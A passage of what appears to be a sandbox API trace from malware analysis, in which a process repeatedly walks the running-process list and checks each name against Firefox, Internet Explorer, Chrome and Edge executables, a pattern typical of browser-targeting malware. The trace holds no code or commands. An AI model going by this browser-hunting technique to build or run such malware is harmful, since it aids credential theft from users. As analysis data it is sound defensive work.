[0197.689] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.689] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.689] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.689] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.689] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.689] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.689] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.689] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0197.690] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0197.690] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0197.690] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0197.690] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.690] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0197.690] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0197.690] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0197.690] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0197.690] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.690] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0197.691] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0197.691] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0197.691] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0197.691] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.691] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.691] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.692] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.692] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.692] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.692] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0197.693] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0197.693] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0197.693] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0197.693] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.693] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0197.693] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0197.693] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0197.693] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0197.693] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.693] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0197.694] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0197.694] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0197.694] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0197.694] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.694] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0197.694] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0197.694] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0197.694] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0197.694] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.695] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0197.695] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0197.695] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0197.695] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0197.695] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.695] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0197.696] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0197.696] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0197.696] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0197.696] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.696] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0197.696] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0197.696] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0197.696] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0197.696] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.696] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0197.697] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0197.697] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0197.697] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0197.697] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.697] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0197.697] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0197.697] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0197.697] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0197.697] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.697] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0197.698] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0197.698] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0197.698] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0197.698] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.698] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0197.698] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0197.699] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0197.699] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0197.699] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.699] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0197.699] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0197.699] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0197.699] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0197.699] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.699] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0197.700] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0197.700] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0197.700] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0197.700] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.700] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0197.700] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0197.700] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0197.700] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0197.700] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.700] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0197.701] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0197.701] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0197.701] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0197.701] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.701] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0197.701] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0197.701] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0197.702] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0197.702] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.702] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0197.702] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0197.702] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0197.702] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0197.702] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.702] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0197.703] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0197.703] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0197.703] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0197.703] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.703] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0197.703] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0197.703] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0197.703] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0197.703] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.703] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0197.704] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0197.704] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0197.704] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0197.704] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.704] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0197.704] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0197.704] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0197.704] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0197.704] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.704] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0197.705] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0197.705] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0197.705] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0197.705] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.705] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.705] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0197.706] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0197.706] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0197.706] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.706] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.706] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.706] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.706] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.706] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.706] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0197.707] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0197.707] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0197.707] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0197.707] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.707] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.707] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.707] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.707] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.707] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.707] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0197.708] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0197.708] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0197.708] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0197.708] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.708] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.709] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0197.709] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0197.709] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0197.709] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.709] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.709] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0197.709] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0197.709] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0197.709] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.709] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0197.770] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0197.770] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0197.770] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0197.770] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.770] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0197.771] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0197.771] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0197.771] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0197.771] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0197.771] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.771] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0197.771] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0197.771] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0197.771] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.771] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.772] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0197.772] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0197.772] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0197.772] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.772] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.772] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0197.772] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0197.772] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0197.772] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.773] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.773] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0197.773] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0197.773] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0197.773] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0197.773] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: 